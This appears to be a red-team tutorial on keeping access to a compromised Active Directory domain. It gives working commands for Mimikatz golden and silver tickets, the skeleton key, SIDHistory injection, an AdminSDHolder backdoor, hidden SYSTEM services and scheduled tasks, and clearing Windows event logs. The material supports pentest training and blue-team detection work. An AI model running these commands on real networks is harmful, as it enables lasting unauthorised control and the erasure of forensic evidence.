Active Directory Persistence, Detection Evasion & Cleanup
Once you have Domain Admin or full control of the domain, the game changes. You’re no longer trying to get in — you’re trying to stay in, quietly, for as long as possible.
This phase covers how attackers create backdoors, avoid detection, and remove their tracks after a successful AD compromise.
What This Phase Is About
- Persistence – Establishing long-term access even if passwords change
- Detection Evasion – Avoiding logs, alerts, and behavioral analysis
- Cleanup – Erasing signs of the breach to avoid investigation or forensic review
Techniques Covered
- Golden Ticket
- Silver Ticket
- Skeleton Key
- SIDHistory Abuse
- AdminSDHolder Backdoor
- GPO Backdoors
- Registry and Service Modifications
- Log Clearing
1. Golden Ticket Attack
The Golden Ticket is a forged TGT using the KRBTGT account hash, giving you unlimited domain access.
With Mimikatz:
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxxxx /krbtgt:<NTLM_HASH> /id:500
Then inject the ticket:
kerberos::ptt golden.kirbi
Result: You now have indefinite access to any domain resource, without needing valid credentials.
2. Silver Ticket Attack
Silver Tickets are forged TGS tickets for specific services — stealthier but more limited.
kerberos::golden /user:svc_web /domain:corp.local /sid:S-1-5-21-xxxxx /target:web.corp.local /service:cifs /rc4:<NTLM_HASH> /id:1105
Then:
kerberos::ptt silver.kirbi
Use when: You only need access to one service, and you want to stay out of the KDC logs.
3. Skeleton Key Attack
Injects a master password into memory on the Domain Controller that works for any user.
misc::skeleton
Default password: mimikatz
Use with caution — very noisy and detectable with memory scanners.
4. SIDHistory Injection
Abuse SIDHistory to give an account the privileges of another user/group.
sid::patch
sid::inject /sids:S-1-5-21-<DA_SID>
This is used to give a low-priv user Domain Admin privileges via SID inheritance.
5. AdminSDHolder Backdoor (Persistence)
Modify AdminSDHolder so that your user retains privileged permissions, even after a reset.
Set-DomainObjectACL -TargetDistinguishedName "CN=AdminSDHolder,CN=System,DC=corp,DC=local" -Rights All -PrincipalIdentity youruser
Every 60 minutes, this ACL propagates to Domain Admins and similar protected accounts.
6. GPO Backdoors
Deploy a GPO that creates a local admin or adds your user to a privileged group.
- Use
GroupPolicyPreferencesto drop a file or set a scheduled task - Add a new local admin via Registry key or file copy in
SYSVOL
Be careful — changes here are often logged.
7. Creating Rogue Services or Scheduled Tasks
Install a hidden service or task as SYSTEM:
sc.exe create "WindowsUpdateService" binPath= "cmd.exe /c whoami > C:\temp\out.txt" start= auto
Or:
schtasks /create /tn "UpdateTask" /tr "powershell.exe -enc ..." /sc minute /mo 5 /ru SYSTEM
8. Clearing Logs
Caution: clearing logs can raise red flags, but attackers do it anyway.
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
Summary
| Technique | Purpose | Risk Level |
|---|---|---|
| Golden Ticket | Domain-wide access anytime | High, detectable |
| Silver Ticket | Service-level stealth access | Medium |
| SIDHistory | Hidden privilege escalation | High, often logged |
| AdminSDHolder Abuse | Persistent privilege ownership | Medium |
| Skeleton Key | Master password for all users | Very high/noisy |
| GPO Backdoor | Privileged re-entry via policies | High, traceable |
| Rogue Services/Tasks | Scheduled access or code exec | Medium |
| Log Clearing | Hide activity trails | High, monitored |
Final Note
This phase is about control and stealth. In a red team or pentest engagement, you’d rarely go this far unless you’re simulating advanced persistent threats (APTs) or testing blue team detection.
Use these techniques wisely and ethically. Also, practice them in isolated labs where you can safely see how they work.